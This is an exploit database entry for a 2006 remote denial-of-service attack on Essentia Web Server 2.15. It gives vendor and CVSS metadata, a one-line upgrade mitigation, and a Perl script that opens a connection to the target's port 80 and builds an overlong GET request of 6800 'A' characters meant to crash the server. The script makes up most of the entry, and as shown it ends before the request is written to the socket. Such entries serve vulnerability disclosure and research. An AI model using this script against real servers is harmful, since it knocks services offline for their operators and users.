Essentia Web Server 2.15 Remote DOS Exploit

vendor:

Essentia Web Server

by:

CorryL

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Essentia Web Server

Affected Version From: 2.15

Affected Version To: 2.15

Patch Exists: Yes

Related CWE: N/A

CPE: a:essentia_technologies:essentia_web_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Essentia Web Server 2.15 Remote DOS Exploit

This exploit is used to cause a denial of service (DoS) on Essentia Web Server 2.15. It sends a large number of 'A' characters to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of Essentia Web Server.

Source

Exploit-DB raw data:

#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', \%args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL          corryl80@gmail.com ]=-\n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

print "usage: perl " . $0 . " -h HOST\n";

exit();
}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";

# milw0rm.com [2006-11-04]